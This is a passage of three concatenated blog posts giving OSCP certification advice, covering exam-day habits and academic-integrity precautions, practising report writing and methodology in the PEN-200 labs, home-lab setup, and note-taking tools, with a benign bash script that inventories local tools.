Your exam success largely depends on the quality of your notes. Make a habit of taking structured, detailed, and legible notes throughout your technical challenges. Consider building a note template in a node-based application like Obsidian and refining it during a few PEN-200 Challenge Labs or Hack the Box (HTB) machine exercises. The more structure you establish in advance, the more mental bandwidth you preserve on exam day. Effective note-taking is a transferable skill that strengthens both your technical execution and report-writing abilities as an offensive security consultant.

A few days before an exam, I like to deep clean my office—starting with vacuuming the floors and finishing by decluttering my workspace. A minimalist setup not only supports compliance with OffSec’s exam policies (more on that later), but also fosters a calmer mental space where you can think clearly and move efficiently. I also recommend silencing your phone, placing it out of reach, notifying others that you’ll be unavailable, and using noise-canceling headphones if you’re in a shared household. The fewer distractions in your space, the easier it is to focus on solving complex problems.

The tight 24-hour window of the OSCP exam demands a strategic approach to time management. Techniques like the Pomodoro Technique—working in focused sprints followed by short breaks—can help prevent burnout and minimize the risk of losing hours chasing rabbit holes. Even if you choose not to use a formal time-management method, entering the exam with a clear plan is far more effective than charging in with a purely reactive mindset. Some approaches that merit attention include capping your focus on a single challenge to 60-90 minutes before pivoting to another, or pre-allocating specific blocks of time to each machine/challenge set in the exam.

Your time-management strategy should also account for the maintenance of your own body: plan your meals in advance, step away from the screen while eating, and stay well hydrated. If possible, build in time on test-day for light aerobic activity—such as a quick jog, a walk with the dog, or a short set of bodyweight exercises like jumping jacks, mountain climbers, or burpees. Brief physical movements can help re-energize your mind, reduce stress, and boost cognitive performance.

To help anchor your experience and reduce anxiety, consider designing personal pre- and post-exam rituals. The night before, do something relaxing—like casually reviewing your notes, solving an easy HTB machine, or writing encouraging Post-it notes to stick on your wall. Set your clothes, snacks, and water up like you’re getting ready for a marathon—because in many ways, you are. After the exam, give yourself a buffer to recover, reflect, and decompress. Personally, I like to go out with friends, play nostalgic video games, or grab a Guinness. Whatever your rituals look like, make them personal and genuinely rewarding.

Finally, I encourage all students to embrace the result of the exam, pass or fail. The OSCP is not the final word on your skills—it’s a checkpoint, not a verdict. In fact, failing by a narrow margin can often be more educational—and ultimately more empowering—than barely passing. By adopting a growth mindset, you can view a missed attempt not as a reflection of your limitations, but as an opportunity to walk away with clearer insight into your strengths and gaps. This self-awareness can be carried with confidence into job interviews, real-world engagements, and the refinement of your study plan. We’ll explore this topic more deeply in the next post.

Building sustainable and empowering exam habits isn’t just about getting through a difficult 24 hours; it’s about establishing a process you can carry into future certifications, real-world assessments, and high-stakes professional challenges. By developing tenable and fulfilling exam-day practices with intent, you give yourself the best possible chance to succeed—not just in the exam, but in the career that follows.

Don’t Risk Your Exam Attempt

The OSCP certification is a multi-thousand dollar investment, so the last thing any student wants is to have their attempt invalidated due to a preventable mistake or misunderstanding that results in an accusation of academic misconduct. Rather than viewing the exam solely as a test of technical skill, candidates should approach it as a professional engagement with clearly defined operational and ethical boundaries. To safeguard the time, effort, and money you’ve invested in the OSCP journey, it’s imperative to read every instruction carefully, double-check your testing environment, and follow OffSec’s exam-day guidelines to the letter.

As one of the most recognized credentials in cybersecurity, the OSCP carries significant industry weight—and OffSec therefore takes the integrity of its exam process seriously. In 2018, in response to growing concerns about cheating, OffSec introduced an online proctoring system to the exam. Candidates are required to verify their identity with a government-issued ID and maintain continuous screen sharing and webcam visibility during the first ~24 hours of the exam.

In 2019, an individual using the handle cyb3rsick publicly released write-ups for several [now retired] OSCP exam machines, reportedly in protest of the exam’s format, which they claimed “allowed thousands of [students] to cheat and pass the exam”. Coverage of the incident highlighted both the controversy and the industry’s reaction. In response, OffSec published a blog post that provided insight into the organization’s anti-cheating measures. These include: relying on community reports, monitoring suspicious groups or individuals, modifying exam systems on a “regular basis”, using undisclosed detection mechanisms during grading, and online proctoring. Most notably, OffSec emphasized that cheaters may face severe consequences—including potential legal action. As stated in their post, “cheaters have lost their certs, paid fines, lost their jobs, and been embarrassed in front of their peers”.

Some stories involving failed exam attempts, revoked certifications, or bans appear to stem from accidental missteps rather than deliberate misconduct. While it’s clear that OffSec has taken meaningful action against individuals who have knowingly violated academic integrity policies, it’s also reasonable to acknowledge that some cases may result from honest mistakes, misunderstandings, or technical issues. One example occurred in 2019, when a student used the common Linux/Unix* post-exploitation enumeration tool, LinPEAS, during their exam. At the time, a recent update to the script had introduced an auto-exploitation feature, which resulted in the student escalating privileges immediately on the target host. Because the Exam Restrictions prohibit the use of tools with auto-exploitation capabilities, the student initially received a failing grade. OffSec later addressed the incident in a blog post, and the student reportedly had their result overturned and was awarded a passing grade. There have also been multiple incidents of students losing their certifications after their private exam reports were leaked or stolen and subsequently used by others to cheat—an issue OffSec has acknowledged in their Support Portal.

This section is not intended to criticize or undermine OffSec’s authority to vigorously pursue cases of academic misconduct or copyright infringement, but rather to inform aspiring OSCP-certified professionals—especially those acting in good faith—on how to conduct themselves confidently and transparently on exam day.

To align with OffSec’s expectations for a successful exam day, I recommend the following:

  • Revisit the OSCP Exam Guide and PEN-200 Reporting Requirements a week or two before your exam; consider incorporating them into a Requirements or Rules of Engagement section in your report template to reinforce them into memory
  • Keep the proctoring window visible at all times, reply promptly to requests, and reconnect your camera immediately if it becomes disconnected
  • Remove unnecessary items from your workspace, such as additional screens (OffSec permits up to four monitors during the exam), notebooks, smart devices, or inactive laptops
  • Store your phone in a separate room and notify others that you’ll be unreachable during the exam
  • Before the exam, take inventory of your toolkit and review each utility’s documented functionality to ensure it doesn’t include features that OffSec prohibits (e.g., spoofing, automatic exploitation, commercial services) and keep a record of any new tools you use during the exam; this level of caution is also applicable to real-world engagements, where it is important to fully understand the behavior and implications of the tools you deploy in a client environment
  • Keep all notes local; avoid accessing documents stored on cloud platforms (e.g., GitHub, GitLab, or OneNote)
  • Terminate unnecessary screen-sharing programs (e.g., Discord, Zoom, Teams); even idle background processes can raise red flags
  • Use a single device and identity throughout the exam; ensure the name on your ID matches your OffSec registration details, complete the exam on a single authorized system, and terminate any third-party virtual private network (VPN) applications—as changing IP addresses mid-exam may be interpreted as location switching
  • Minimize physical and digital movement; don’t leave the camera’s view without telling the proctor, and avoid switching desktops, using unrelated virtual machines (VMs), or removing hardware devices
  • Never download artifacts from the exam environment to your local machine; all work should remain within your VM
  • Be mindful of physical cues that might appear suspicious on camera, such as repeated glances away from the screen, whispering, interacting with unmonitored people, or unexplained movements
  • If you’re referencing notes from a previous attempt, inform the proctor to distinguish it from reused or plagiarized content
  • Have a backup device and mobile hotspot ready in case of system failure or internet loss
  • Consider creating a clean system user profile just for the exam to reduce redundant applications and protect your privacy
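One way to act on the toolkit-inventory point above (taking stock of each utility before the exam and keeping a record of what you used) is a small script that writes a dated, hashed list of the tools on your Kali VM. This is an added example, not code from the original post or from OffSec; the tool names passed to it and the output file path are placeholders you would replace with your own list, and it assumes a Linux host with GNU coreutils (`sha256sum`, `readlink -f`, `timeout`). Having the path and SHA-256 of every binary on record means that, if a proctor or grader later asks what a given tool was, you can answer precisely rather than from memory.

```shell
#!/usr/bin/env bash
# Added example (not part of the original post): build a pre-exam inventory of
# the tools you intend to use, recording path, SHA-256 and reported version.
set -eu

# Print one tab-separated inventory line for a tool name:
#   name <TAB> resolved path <TAB> sha256 <TAB> first line of --version output
# Returns 1 (and prints a MISSING line) when the tool is not on PATH.
inventory_tool() {
    name="$1"
    if ! path="$(command -v "$name" 2>/dev/null)"; then
        printf '%s\tMISSING\t-\t-\n' "$name"
        return 1
    fi
    real="$(readlink -f "$path")"                      # follow symlinks to the real binary
    hash="$(sha256sum "$real" | cut -d' ' -f1)"        # hash the file that actually runs
    # Many tools answer --version; some do not, so bound the call and tolerate failure.
    ver="$(timeout 5 "$real" --version </dev/null 2>/dev/null | head -n1)"
    printf '%s\t%s\t%s\t%s\n' "$name" "$real" "$hash" "${ver:-unknown}"
}

# Write the inventory for every tool name given to the file in $1.
# Echoes the number of tools that were found so callers can sanity-check it.
write_inventory() {
    out="$1"; shift
    found=0
    {
        printf '# toolkit inventory generated %s on %s\n' "$(date -u +%FT%TZ)" "$(uname -n)"
        for name in "$@"; do
            if inventory_tool "$name"; then
                found=$((found + 1))
            fi
        done
    } > "$out"
    echo "$found"
}

# Placeholder usage: replace the tool list with the utilities you actually plan to use.
# write_inventory "$HOME/exam-toolkit-inventory.tsv" nmap ssh python3 ls
```

Run it once before the exam and keep the file with your notes; re-running it with any tool you install mid-exam appended to the list gives you the "record of new tools" the checklist asks for.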

If, despite following this advice, you’re still accused of academic misconduct, stay calm and professional. Cooperate fully with the investigation, be honest and transparent, and avoid becoming defensive—it’s important not to escalate the situation. Instead, politely request specific details regarding the accusation, seek to understand the exact concerns, and explain any misunderstood behavior or tools (e.g., a tool that was not on the shortlist of restricted software but raised concern). If you’re unsatisfied with the outcome, wait a week or two to cool off before submitting a formal appeal to challenges [at] offsec [dot] com. Maintain the same professional and respectful tone in your appeal as you did during the investigation.

On a final note, it’s important to acknowledge that OffSec exams involve a high degree of monitoring. Your screen is shared throughout the exam, you’re under near-continuous video surveillance, and you must perform a 360-degree scan of your workspace to confirm that no unauthorized devices or individuals are present. Before beginning the exam, Windows users are required to execute a proctor-provided PowerShell script that gathers system information and lists running processes—likely to flag potentially unauthorized tools. Out of an abundance of caution, it’s a good idea to clean up your local system before exam day; remove any personal files or unfamiliar tools that could trigger concern. For more details on how OffSec collects and processes personal data, refer to their Privacy Policy.

NOTE:
If you’re uncomfortable with the format or privacy implications of the OSCP exam, you might consider alternatives like the Certified Red Team Operator (CRTO) or Practical Network Penetration Tester (PNPT). These certifications cover similar material and offer more flexible testing policies.

OffSec has every right (and responsibility) to uphold the integrity of its certification, but that doesn’t make the proctoring process any less stressful for honest students. Trying to be diplomatic while raising a nuanced point, it’s fair to say that even well-intentioned candidates may find themselves under scrutiny. By taking proactive steps to minimize ambiguity in your environment and interactions with the proctors, you not only protect your OSCP investment but also reinforce the professional habits OffSec aims to instill through its arduous exam process.

Conclusion

Feel free to leave a comment with any questions, feedback, or additional advice to contribute to this discussion. In the final post of this series, I’ll cover what students should do after each OSCP exam attempt—whether they pass or not.


Getting the Most Value Out of the OSCP: The Exam was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

Getting the Most Value Out of the OSCP: The PEN-200 Labs

How to leverage the PEN-200 simulated black-box penetration testing scenarios for maximal self-improvement and career success.

DISCLAIMER:
All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

In the last post of this series, I explored some hidden benefits and extra steps students should take when writing notes for the PEN-200: Penetration Testing with Kali Linux course. Before attempting the Offensive Security Certified Professional (OSCP) exam, it’s highly recommended to complete the practical lab networks. But first, read this article to learn how to maximize the lab experience.


During the Labs…

“Success is no accident. It is hard work, perseverance, learning, studying, sacrifice, and most of all, love of what you are doing.” — Pelé

The PEN-200 course includes multiple virtual lab environments, each offering an opportunity to grow as an offensive security professional. The three key takeaways from this post are:

  1. Learn how to write a high-quality penetration testing report and apply those skills to each lab network
  2. Use the labs as a baseline to build your own testing environment where you can refine offensive techniques, understand how misconfigurations arise, and analyze network packets associated with different attacks
  3. Develop a repeatable testing methodology, apply it to the labs, and continuously refine it through an iterative process

Write Reports for Each Lab

For all the effort OSCP candidates put into identifying and exploiting technical vulnerabilities, the irony of the course is that its arguably most valuable skill is also the least offensive: report writing. In the real world, the value of an offensive security engagement doesn’t come from hacking efforts alone—it mostly comes from a legible, actionable, and informative report. Given this, it’s somewhat disappointing that the OSCP exam report—a required component of the certification process—is graded more on accuracy than quality. According to the PEN-200 Reporting Requirements, “[students] must submit an exam penetration test report clearly demonstrating how [they] successfully achieved the certification exam objectives”. This policy ensures that passing students have demonstrated the minimum technical competency of an offensive security professional, but not necessarily the writing skills needed to excel in the field. If your goal is not just to pass the exam but to be a standout candidate in future consulting roles, you should learn how to write an exemplary penetration test report and use the PEN-200 labs as practice.

Report writing is often the least enjoyable part of a penetration test, but a poorly written report can have serious consequences. The most immediate impact may be frustration from supervisors or colleagues, but the affected audience is often much larger. If your firm has a quality assurance (QA) process, multiple rounds of revision can delay the report’s delivery, damaging the company’s reputation. Worse, if significant errors slip through and the client receives a flawed report—such as one containing incorrect, incomplete, or difficult-to-read sections—the aftermath can be disastrous. Miscommunication about findings can lead to delayed security improvements, inadequate risk mitigations, and ultimately an unresolved attack surface. The client may become furious over wasted time and resources, potentially demanding revisions, reattempts, or—worst-case scenario—a partial or full refund.

Given the stakes, it’s imperative to take reporting seriously—and this is where the PEN-200 labs come in. While their official purpose is to provide students a sandbox environment for practicing their newly learned offensive techniques, they also serve as an excellent training ground for report writing. The lab structures simulate a black-box penetration test scenario, lending authenticity and relevance to aspiring offensive security professionals. Furthermore, three lab networks are specifically designed to replicate the OSCP exam conditions, allowing students to simulate the exam environment under self-imposed time constraints.

NOTE:
Consider attempting two of these lab networks within a 48-hour window (24 hours each for testing and reporting) before your first exam attempt, reserving the third for after you’ve conducted your first attempt postmortem (more on that later in the series).

Before you begin report writing, it’s essential to understand their structure. While formats vary across firms, most reports include at least an Executive Summary, Assessment Results, Attack Path Narrative, and Appendix. A full breakdown of these sections is beyond the scope of this post, but for practical guidance, Brian King’s Hack for Show, Report for Dough (Wild West Hackin’ Fest 2018) is a phenomenal resource. It also covers several report writing best and worst practices, helping students refine their skills. Students can also reference OffSec’s official OSCP exam report templates as a primary source for understanding the certification provider’s expectations.

When writing reports, I strongly advise sticking to Microsoft Word. While I personally find it somewhat infuriating and a victim of “featuritis”, it remains the dominant word processor application in the industry and offers useful features like change trackers (especially relevant for collaborative projects), cross-references, and a citation management system. For screenshots, I highly recommend Greenshot, Flameshot, Snagit, and ZoomIt from the Sysinternals suite. Including a network topology diagram in your lab reports can improve clarity—draw.io is a popular choice for this. Finally, ensure that your report writing toolset does not violate OffSec’s Academic Policy; for example, as stated in the OSCP Exam Guide, using large language models (LLMs) and artificial intelligence (AI) chatbots to generate or refine content constitutes sharing PEN-200 material with a third-party, which is a copyright violation.

Each firm has its own style guide for consultants, so it’s important to adopt a writing style that aligns with industry expectations when creating lab reports. While I couldn’t find a publicly available style guide specifically for penetration test reports, the Microsoft Writing Style Guide serves as a suitable alternative. Below are key writing principles to follow, with some modifications and additions to Microsoft’s guide:

  • Use active voice over passive voice (e.g., “the student scanned the host…” vs. “the host was scanned by the student…”), unless the latter sounds objectively less “awkward”
  • Maintain a consistent preterite verb tense and third-person narrative (e.g., “the student conducted a penetration test…”)
  • Spell out acronyms on first use (e.g., “dynamic link library (DLL)”)
  • Assign articles to acronyms based on pronunciation (e.g., “a DLL, an ISP”)
  • Ensure text in screenshots is at least as large as figure subtitles or body text for readability
  • Avoid opinionated language, colloquialisms, redundant phrases, and contractions to maintain a professional tone


The main drawback of using the PEN-200 labs for report writing practice is that students cannot share their reports for peer-review due to copyright restrictions. According to Section 16 (IP Ownership) of OffSec Terms and Conditions, students are forbidden from sharing derivative PEN-200 content such as lab walk-throughs—which implicitly includes reports. Violating this agreement could result in punitive action from OffSec, such as having existing certifications revoked or being banned from future enrollment. To work within these constraints, students should conduct independent research on report writing and rigorously self-grade their reports while keeping them private. Those seeking peer feedback can instead write reports on alternative virtual lab environments with looser copyright restrictions, such as Hack the Box (HTB), and request evaluation from qualified career mentors.

It’s in your best interest to start developing your report writing skills early and the professionally managed PEN-200 lab networks provide an excellent environment to practice within. If you’re still struggling with report writing—or want to learn more about report review, delivery, and feedback procedures in general—consider enrolling in Luke Rogerson’s The Art of Report Writing, offered by Zero-Point Security. While I haven’t personally taken the course, it comes highly recommended by many in the consulting field and features an expansive syllabus. Investing in your report writing abilities—both during the PEN-200 labs and through external resources—will pay dividends in your future career.

Use the Labs as a Baseline for Your Personal Lab

The PEN-200 labs are excellent for simulating black-box penetration tests, but students shouldn’t rely solely on them for experimenting with offensive techniques. Your ultimate goal should be to either design a personal lab for yourself or use an existing template by the time you have completed the PEN-200 labs. If you choose to follow the former path, don’t be afraid to take inspiration from the labs when designing your own.

Developing your own cyber range offers several advantages over the PEN-200 labs. Most obviously, your lab access won’t expire when your OffSec subscription ends. Setting up a personal lab manually also deepens your understanding of how misconfigurations and vulnerable applications introduce security risks. You can also expand upon the PEN-200 syllabus by incorporating technologies not covered in the course, such as security incident and event management (SIEM) solutions, Kerberos delegation attack paths, and persistence techniques, to name a few. If you want to get even more granular, you can use a network protocol analyzer utility like Wireshark to manually inspect the network packets associated with your favorite tools or exploits. Finally, for students eager to stay current with cybersecurity trends, a personal lab provides a low-risk environment to deploy and test new exploits and tools.

Historically, deploying a personal cybersecurity lab was a costly endeavor. Simulating an entire Active Directory (AD) network demanded substantial investments in RAM, CPU cores, and HDD/SSD storage, often housed in bulky rack servers or large PC chassis. For those starting from scratch, costs can easily creep up to hundreds or even thousands of dollars. Luckily, mini PCs like the GMKtec NucBox offer a significantly more affordable and compact alternative to the comically large and expensive gaming rigs often associated with home labs. You can even purchase a barebones mini PC—no RAM, SSD, or OS pre-installed—and salvage memory and storage components from refurbished PCs. By integrating them into a custom-built setup and installing an open-source OS like Ubuntu, you can significantly cut costs while still aggregating the hardware required to create a fully functional lab environment.

Deploying a cybersecurity lab has traditionally been seen as a technically demanding experience due to the sheer scope of involved technologies. Most PEN-200 students may already be familiar with virtualization platforms like VMware Fusion and Workstation or Oracle VirtualBox, but not necessarily infrastructure as code (IaC) tools like Vagrant, Terraform, Ansible, and Packer. Similarly, containerization platforms such as Docker, Podman, or Kubernetes (K8s) introduce additional complexity. Once the lab is deployed, students must also administer network segmentation, domain name system (DNS) records, snapshot management, and, in the case of free licensed Windows virtual machines (VMs), manually extend the 180-day trial period by rearming the instance. Thankfully, platforms like Ludus have emerged to simplify the cybersecurity lab deployment process, consolidating many of these technologies into a single, streamlined solution.

Ludus is a cyber range orchestration platform created by Erik Hunstad, the founder of Bad Sector Labs and Chief Technology Officer of Sixgen. The platform is built on top of the Proxmox Virtual Environment (Proxmox VE) hypervisor—a powerful open-source solution for VM and container management—enabling the virtualization of entire simulated networks. Among its many features, Ludus supports user-defined networking and firewall rules, DNS record management, snapshot functionality, and automated configuration pulls from Ansible Galaxy’s collection library. It deploys VM templates that can either be sourced from Ludus’s built-in library or customized and imported. The end-user only needs to install Ludus on a dedicated host, create an environment configuration file, deploy the range, and apply host- or domain-specific changes—which can easily be automated. Ludus is an extremely powerful and customizable tool for students who want to focus on refining their penetration testing skills rather than spending excessive time troubleshooting setup issues.

Ludus | Ludus

Designing a cyber range from scratch can be intimidating, but fortunately, multiple preconfigured penetration testing labs are available for students to deploy. One of the most popular lab templates today is Game of Active Directory (GOAD) by M4yFly, offered by Orange Cyberdefense. GOAD supports multiple attack path scenarios, many of which are covered in the PEN-200 course, making it an ideal choice for a first personal cyber range. It is also compatible with Ludus, further simplifying deployment.

Game Of Active Directory v2

Regardless of whether you use GOAD, a custom-built network, or another public lab template, consider supplementing the range with Elastic Security, a SIEM platform from the Elastic Stack (ELK). Integrating Elastic Security—or another free SIEM solution—into your lab allows you to observe how offensive techniques are detected in real time, providing valuable insight into defensive strategies. Elastic Security is also Ludus-compatible and, to demonstrate how to integrate it with a personal cyber range, I recommend this walkthrough from I.T. Security Labs that shows how to deploy GOAD with Elastic Security through Ludus.

NOTE:
Other noteworthy lab templates include BadBlood, ADCS Lab, and SCCM Lab, the last two of which are compatible with Ludus. BadBlood (by Secframe) is a PowerShell scripting suite that generates polymorphic Microsoft AD cyber ranges, ensuring distinct challenges with each invocation. The ADCS and SCCM labs focus on Active Directory Certificate Services (AD CS) and Microsoft Configuration Manager (MCM/SCCM). While not covered in the PEN-200 syllabus, recent security research has demonstrated that both represent a significant attack surface, and the aforementioned labs provide an opportunity to develop skills in testing and securing both technology stacks.

In conclusion, a personal cybersecurity range inspired by the PEN-200 lab networks provides several key advantages: freedom from OffSec subscription limits, exposure to multiple relevant technologies, a sandbox for testing new techniques and tools, and the ability to integrate operational security (OPSEC) solutions. If you successfully design a custom penetration testing lab from scratch (not derivative of PEN-200 content), you can share your deployment template publicly—a valuable addition to your portfolio that can strengthen future job applications.

Develop a Testing Methodology

Once you begin the PEN-200 labs, it’s crucial to develop a repeatable and self-improving testing methodology early to avoid falling into a “spray and pray” mentality. A structured approach not only helps you uncover hidden vulnerabilities more efficiently, but also minimizes the risk of needing lab extensions or incurring multiple exam retake fees—maximizing the value of your PEN-200 experience.

In the context of PEN-200 and offensive security, a testing methodology is a systematic process encompassing enumeration, documentation, tool selection, exploit testing, privilege escalation, and post-exploitation routines. Ideally, your methodology should evolve as you progress through the labs—allowing you to address knowledge gaps, adopt time-saving techniques, and incorporate novel attack strategies. Students who follow a codified and mature testing methodology are less likely to waste time redoing scans, chase dead ends, overlook low-hanging fruit, succumb to burnout and frustration, or rely on luck or accidental success to achieve the testing objective.

In the first post of this series, I introduced the concept of command reference guides (AKA “cheat sheets”), which serve as a repository for your preferred offensive tooling usage. Beyond providing easy copy-and-paste shortcuts for commands, your reference guide can be structured to align with your testing methodology. In our previous example, I demonstrated how you could leverage Obsidian to document the usage of impacket-GetUserSPNs for conducting a Kerberoasting attack. Let’s expand on this example by organizing the navigation pane of the guide into distinct phases of a simple penetration testing methodology.

Our reference guide now consists of seven root directories, each representing a major phase of a typical penetration test (e.g., Reconnaissance, Initial Access, Privilege Escalation, etc.). Notice how each of the three tools we’ve added so far (i.e., impacket-GetUserSPNs, BloodHound, and Hashcat) is intuitively placed within the appropriate parent directory, and further compartmentalized into subdirectories based on the specific technique utilized during that phase (e.g., Identifying Kerberoastable Accounts, Kerberoasting, Hash Cracking, etc.). In the Internal Enumeration and Privilege Escalation phases, we’ve gone a step further by dividing techniques by the environment we’re working in—in this case, Active Directory, Linux, and Windows. Since Kerberoasting is specific to AD environments, we placed our entry for BloodHound and impacket-GetUserSPNs in the Active Directory subdirectory of Internal Enumeration and Privilege Escalation, respectively.

I want to emphasize the importance of iterative learning when developing your testing methodology. It’s unrealistic to expect that your initial attempt at following a testing methodology will be optimal, so it’s critical to refine your process after each lab or exercise—especially during the early, high-growth stage of your OSCP journey. Consider keeping a brief log for each machine or network within your reference guide, summarizing the attack path, the tools and techniques you utilized, and the areas where you struggled most. Use the last section in particular to feed both successes and setbacks into your methodology refinement. This continuous improvement process will steadily strengthen your assessment methodology, significantly boosting your confidence and skills ahead of the OSCP exam.

In conclusion, I strongly encourage students to treat the labs not just as an opportunity to improve their ability to identify and exploit vulnerabilities, but also as a chance to build an iterative, professional methodology for offensive security engagements—and to commit to regularly polishing it as they progress. Doing so will not only prepare you for the OSCP exam, but will also translate directly to future responsibilities in a consulting role, strengthen your technical interview performance, and ultimately support your growth as a security professional.

Conclusion

If you have questions, feedback, or suggestions you feel should have been included in this post, please feel free to leave a comment. In the next installment of this series, I’ll dive into the OSCP exam itself.


Getting the Most Value Out of the OSCP: The PEN-200 Labs was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.


Getting the Most Value Out of the OSCP: The PEN-200 Course

In this second post of a five-part series, I provide advice on how to best utilize the PEN-200 course material for a successful career in ethical hacking.

Disclaimer:
All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

In my previous post in this series, I discussed practical steps students could take before enrolling in PEN-200 to get the most value out of their pursuit of the Offensive Security Certified Professional (OSCP) certification. The next step is to discuss what to do while reading the official course material.

PEN-200: Penetration Testing Certification with Kali Linux | OffSec

During the Course

“One hour per day of study in your chosen field is all it takes. One hour per day of study will put you at the top of your field within three years. Within five years, you’ll be a national authority. In seven years, you can be one of the best people in the world at what you do.” — Earl Nightingale

The PEN-200 course is composed of 28 distinct modules covering fundamental penetration testing concepts. In this post, I discuss my advice for students starting the course. My three main arguments are:

  1. Use the note-taking process and exercises in PEN-200 as a chance to build confidence with tools and platforms relevant to offensive security roles
  2. Not all PEN-200 techniques are practical for real-world assessments — some require adaptation to evade defenses while others risk service disruption, credential exposure, and more; understanding these nuances will make you a more effective and responsible professional
  3. PEN-200’s curated references to blogs, proof of concepts (PoCs), and whitepapers provide not only valuable learning but also insight into key industry contributors, which can give you an edge in job hunting and networking

Use Job-Relevant Tools and Platforms to Write Your Notes

The OSCP certification is primarily geared towards beginner-level security professionals, so it’s fair to assume that most students have limited experience with the tools that offensive security consultants commonly use. The PEN-200 course provides a valuable opportunity for OSCP candidates to gain exposure to these tools and build their proficiency before entering the field.

To clarify, this section is not about the “hacking tools” you will inevitably use to identify and exploit vulnerabilities — PEN-200 provides ample guidance on those. My advice focuses on tools that are tangential to offensive tasks but still widely used in cybersecurity roles.

The PEN-200 course is designed to be completed using Kali Linux, a Debian-based distribution pre-installed with many of the most popular tools for offensive security testing. While Kali is convenient for quickly deploying a Linux virtual machine (VM) with a broad toolkit, you shouldn’t feel restricted to using it for professional development. Experiment with other Linux distributions (e.g., Parrot OS, BackBox Linux, BlackArch) and even Windows-based distributions (e.g., CommandoVM, FLARE-VM) while improving your proficiency with virtualization software like VMware or VirtualBox.

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

Although it is more commonly associated with software development, git — the popular version control system — is a valuable asset to offensive security consultants. Deploying your PEN-200 notes to a git repository offers a great opportunity to improve your fluency with fundamental operations like commit, pull, push, merge, and more. The biggest hurdle to mastering git is often the concept of “branching”: the process of diverging from the primary branch (called master or main, depending on your platform), making independent changes, then later merging those changes back into it. Fortunately, there are many excellent online tutorials to help with this.

Learn Git Branching

If you choose to use git for your notes, consider hosting them in a private repository on GitHub or GitLab. Both platforms are based on git but offer additional features such as access control, repository templates, Markdown support, and more. Personally, I prefer GitLab for storing my notes due to its granular visibility controls, but GitHub is undeniably the most popular option and the one you’re most likely to encounter in a cybersecurity role. Whichever platform you choose, make absolutely sure it’s locked down and only you can access it. Copyright infringements of OffSec’s proprietary course materials — even accidental ones — can result in punitive responses from OffSec.

Now that you’ve chosen where to host your notes, it’s time to start writing them! The three most popular command-line text editors are Vim, Emacs, and nano. Of these, nano is the most beginner-friendly and an excellent starting point. Both Vim and Emacs are feature-rich and highly customizable, but have a high learning curve. If productivity and modularity are values you prioritize, it pays to start learning one (or both) early. The debate over which is superior is so enduring that it even has its own Wikipedia article.

Of the two, I only have experience with Vim, so it’s the only one I can recommend. Its commands can be confusing at times, but it’s a huge productivity booster in the long-run. If you decide to go down the Vim rabbit hole, I recommend starting with Vi, Vim’s precursor. Vi supports fewer commands, but is more likely to be encountered on older Linux distributions, so you won’t be caught off guard when your favorite Vim commands aren’t working. Once you’ve got the hang of Vi and are ready to graduate to Vim mastery, consider using the online tutorial/game VIM Adventures to hone your skills.

Learn VIM while playing a game - VIM Adventures

Command-line text editors can be fun, but they’re not for everyone. If that’s you, I highly recommend Obsidian as your note-taking application. As I discussed in my last blog post, Obsidian is an extremely popular graphical text editor packed with useful features. In 2021, an employee of the cybersecurity consulting firm TrustedSec published a blog post detailing how they incorporated Obsidian into their internal tradecraft documentation. While this setup isn’t a one-to-one equivalent of an online course, the features showcased in the article — especially the usage of the Obsidian-Git community plugin — are particularly relevant for PEN-200 students.

Obsidian, Taming a Collective Consciousness

tmux is an open-source terminal multiplexer which allows users to manage multiple terminal instances from a single screen. This might not seem groundbreaking if you work from a multi-monitor desktop; however, tmux is a game-changer when you’re managing multiple jobs on a remote Linux system with only shell access. You can split your terminal into multiple panes, reattach to sessions in case a connection drops, or run concurrent background jobs and reconnect to them as needed. Needless to say, it’s an incredibly powerful utility that’s often overlooked. Most PEN-200 students know IppSec from his Hack the Box (HTB) walkthroughs, but his tmux tutorial is just as valuable to OSCP-hopefuls.

Lastly, take advantage of every opportunity to sharpen your scripting skills in languages like Python, Bash, PowerShell, and more. Some great use cases would be scheduling tasks on Kali via cron jobs, or automating the process of reconnaissance, post-exploitation enumeration, and credential extraction. As you study, you’ll come across many PoC exploits — some written in languages you don’t know, others that could be improved upon. Instead of settling, why not rewrite the PoC yourself in your preferred language? Not only does this give you a working exploit, but it also becomes a strong addition to your job application portfolio. For inspiration, check out this blog post by a colleague of mine, who developed a working exploit for CVE-2022-35914 after finding the official solution for an OffSec Proving Grounds machine unsatisfactory. When developing scripts or PoCs, consider using a code editor like Visual Studio Code, a popular Microsoft option packed with features and supported languages.

Charting a path to RCE thru PHP callbacks

In short, be proactive when writing your notes. While you may never need to learn an entirely new scripting language, coding platform, or operating system on the fly during a billable engagement, it helps to have a solid grasp of the most useful technologies before landing your first consulting job.

Understand the Real-World Impact of Each Technique

The PEN-200 course provides a thorough and comprehensive foundation in penetration testing. However, applying its techniques in real-world engagements exactly as taught — without considering their potential impact — can lead to unintended consequences. Understanding not just how a technique works but also when, where, and whether to use it, distinguishes a skilled penetration tester from “script kiddies”. This section explores the risks of blindly following course material and how students can develop the judgment necessary to apply techniques responsibly in real-world engagements.

NOTE:
Developing a mature understanding of our tradecraft also helps mitigate the risk of introducing a backdoor through our toolkit. This is demonstrated in a recent CloudSEK report, which revealed that a trojanized version of a remote access Trojan (RAT) malware builder infected 18,459 devices, mostly belonging to cybersecurity students and hobbyists.

OSCP-certified professionals generally agree that PEN-200 does not emphasize stealth. While the syllabus includes an antivirus (AV) evasion module, the course primarily teaches identifying and exploiting vulnerabilities rather than evading detection — likely to prevent overwhelming new students. However, many of these techniques would immediately trigger alerts in security-mature environments. For example, Mimikatz, a popular tool for extracting plaintext credentials and password hashes from Windows Local Security Authority Subsystem Service (LSASS) memory, would almost certainly trigger endpoint detection and response (EDR) alerts if executed in its original binary form. Many penetration testing techniques face similar scrutiny, and students should understand their OPSEC implications before applying them in real-world assessments.

